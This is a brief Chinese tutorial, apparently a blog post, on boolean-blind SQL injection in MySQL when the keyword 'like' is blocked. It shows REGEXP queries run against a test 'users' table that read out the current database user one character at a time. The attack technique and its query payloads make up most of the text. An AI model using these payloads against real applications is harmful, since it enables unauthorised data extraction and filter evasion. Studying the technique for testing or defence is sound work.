0x00 概要
不允许 “like” 出现时的注入方法
使用 REGEXP 可以实现与 like 相同的功能
使用方法: 表达式 REGEXP ‘^判断条件’ 相当于 表达式 like ‘判断条件%’
0x01 测试数据
mysql> select user();+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)
mysql> select current_user;+----------------+| current_user |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)
mysql> select * from users where id=1;+----+----------+----------+| id | username | password |+----+----------+----------+| 1 | Dumb | Dumb |+----+----------+----------+1 row in set (0.00 sec)
0x02 测试
// 正确的情况// 会返回原来的数据页面保持不变mysql> select * from users where id=1 and '1' REGEXP '^1';+----+----------+----------+| id | username | password |+----+----------+----------+| 1 | Dumb | Dumb |+----+----------+----------+1 row in set (0.00 sec)
// 查询current_user数据正确的情况// 会返回原来的数据页面保持不变,说明 current_user 第一位为 “r”mysql> select * from users where id=1 and current_user REGEXP '^r';+----+----------+----------+| id | username | password |+----+----------+----------+| 1 | Dumb | Dumb |+----+----------+----------+1 row in set (0.00 sec)
// 查询current_user数据正确的情况// 会返回原来的数据页面保持不变,说明 current_user 第二位为 “o”mysql> select * from users where id=1 and current_user REGEXP '^ro';+----+----------+----------+| id | username | password |+----+----------+----------+| 1 | Dumb | Dumb |+----+----------+----------+1 row in set (0.00 sec)
// 错误的情况// 页面会爆错,如果关闭了错误提示,页面的数据会为空mysql> select * from users where id=1 and current_user REGEXP '^aa';Empty set (0.00 sec)
若有收获,就点个赞吧
0 人点赞
